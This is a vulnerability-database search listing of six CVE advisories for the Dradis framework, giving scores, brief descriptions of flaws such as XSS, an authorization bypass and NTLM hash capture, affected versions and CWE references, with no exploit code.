6 results (0.002 seconds)

CVSS: 3.5EPSS: 0%CPEs: 1EXPL: 0

10 Jul 2025 — In Dradis before 4.11.0, the Output Console shows a job queue that may contain information about other users' jobs. • https://github.com/dradis/dradis-ce/tags • CWE-1230: Exposure of Sensitive Information Through Metadata •

CVSS: 4.1EPSS: 0%CPEs: 1EXPL: 0

05 Jul 2025 — Dradis through 4.16.0 allows referencing external images (resources) over HTTPS, instead of forcing the use of embedded (uploaded) images. This can be leveraged by an authorized author to attempt to steal the Net-NTLM hashes of other authors on a Windows domain network. • https://dradis.com • CWE-294: Authentication Bypass by Capture-replay •

CVSS: 8.7EPSS: 0%CPEs: 1EXPL: 0

25 Apr 2023 — Dradis before 4.8.0 allows persistent XSS by authenticated author users, related to avatars. • https://dradisframework.com/ce/security_reports.html#fixed-4.8.0 • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •

CVSS: 5.9EPSS: 0%CPEs: 1EXPL: 0

24 Jun 2022 — Dradis Professional Edition before 4.3.0 allows attackers to change an account password via reusing a password reset token. Dradis Professional Edition versiones anteriores a 4.3.0, permite a atacantes cambiar la contraseña de una cuenta por medio del reúso de un token de restablecimiento de contraseña • https://dradisframework.com/ce/security_reports.html • CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') •

CVSS: 6.5EPSS: 0%CPEs: 1EXPL: 1

16 Mar 2020 — The API in Dradis Pro 3.4.1 allows any user to extract the content of a project, even if this user is not part of the project team. La API en Dradis Pro versión 3.4.1, permite a cualquier usuario extraer el contenido de un proyecto, inclusive si este usuario no es parte del equipo del proyecto. • https://know.bishopfox.com/advisories • CWE-639: Authorization Bypass Through User-Controlled Key •

CVSS: 5.4EPSS: 0%CPEs: 2EXPL: 0

12 Mar 2019 — Cross-site scripting vulnerability in Dradis Community Edition Dradis Community Edition v3.11 and earlier and Dradis Professional Edition v3.1.1 and earlier allow remote authenticated attackers to inject arbitrary web script or HTML via unspecified vectors. Una vulnerabilidad de Cross-Site Scripting (XSS) en Dradis Community Edition, en versiones v3.11 y anteriores, y en Dradis Professional Edition, en versiones v3.1.1 y anteriores, permite a los atacantes autenticados inyectar scripts web o HTML arbitrario... • http://jvn.jp/en/jp/JVN40288903/index.html • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •